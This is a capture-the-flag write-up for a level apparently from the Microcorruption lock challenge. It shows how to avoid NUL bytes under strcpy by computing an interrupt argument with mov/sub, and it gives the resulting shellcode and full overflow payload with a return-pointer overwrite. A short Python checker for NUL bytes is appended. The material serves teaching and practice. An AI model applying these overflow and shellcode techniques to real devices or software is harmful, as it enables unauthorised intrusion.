# 7. Montevideo
# Challenge Overview
OVERVIEW
- Lockitall developers have rewritten the code to conform to the
internal secure development process.
- This lock is attached to the LockIT Pro HSM-2.
# Solution
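This challenge is very similar to Whitehorse, except for the strcpy call, which ends the string at the first 0x00 byte. That means we can't use a push with an immediate operand like the one below, since its encoding contains a 0x00 byte:
```
445c: 3012 7e00 push #0x7e
4460: b012 4c45 call #0x454c <INT>
```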
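Instead, we can build the value in r15 from two immediates that contain no 0x00 bytes:
```
mov #0x181, r15   ; r15 = 0x181
sub #0x102, r15   ; r15 = 0x181 - 0x102 = 0x7f
push r15          ; push the computed value as the INT argument
call #0x454c      ; call <INT>
---
3f4081013f8002010f12b0124c45
```
Adding the padding and the srp overwrite:
```
3f4081013f8002010f12b0124c454141ee43
```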
This works!
Nice intro to bad bytes.
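
The bad-byte constraint described above, checked in code. This is an added example, not part of the original writeup: it simulates strcpy's stop-at-NUL behaviour on the byte strings quoted on this page. The function names are hypothetical helpers; the byte strings are copied from the listings above.

```python
# Added example: how strcpy's NUL termination treats the byte strings on this page.

def strcpy_copied(data):
    """Return the bytes strcpy would copy: everything before the first 0x00."""
    end = data.find(b"\x00")
    return data if end == -1 else data[:end]

def null_offsets(data):
    """Offsets of every 0x00 byte in data."""
    return [i for i, b in enumerate(data) if b == 0]

def survives_strcpy(data):
    """True if the whole buffer would be copied unchanged."""
    return strcpy_copied(data) == data

def imm16(value):
    """16-bit immediates are stored little-endian, as in the listings above."""
    return (value & 0xFFFF).to_bytes(2, "little")

def computed_value(a, b):
    """Value left in the register after mov #a / sub #b (16-bit wraparound)."""
    return (a - b) & 0xFFFF

# Byte strings taken from the page
DIRECT_PUSH = bytes.fromhex("30127e00b0124c45")  # push #0x7e; call #0x454c
SHELLCODE = bytes.fromhex("3f4081013f8002010f12b0124c45")
PAYLOAD = bytes.fromhex("3f4081013f8002010f12b0124c454141ee43")

def report():
    """Summarise, per buffer, its NUL offsets and what strcpy would copy."""
    rows = []
    for name, buf in (("direct push", DIRECT_PUSH),
                      ("mov/sub/push", SHELLCODE),
                      ("full payload", PAYLOAD)):
        rows.append((name, null_offsets(buf), strcpy_copied(buf).hex(),
                     survives_strcpy(buf)))
    return rows

if __name__ == "__main__":
    for name, nulls, copied, ok in report():
        print(f"{name:13} nulls={nulls} copied={copied} intact={ok}")
    print("mov #0x181 / sub #0x102 ->", hex(computed_value(0x181, 0x102)))
```
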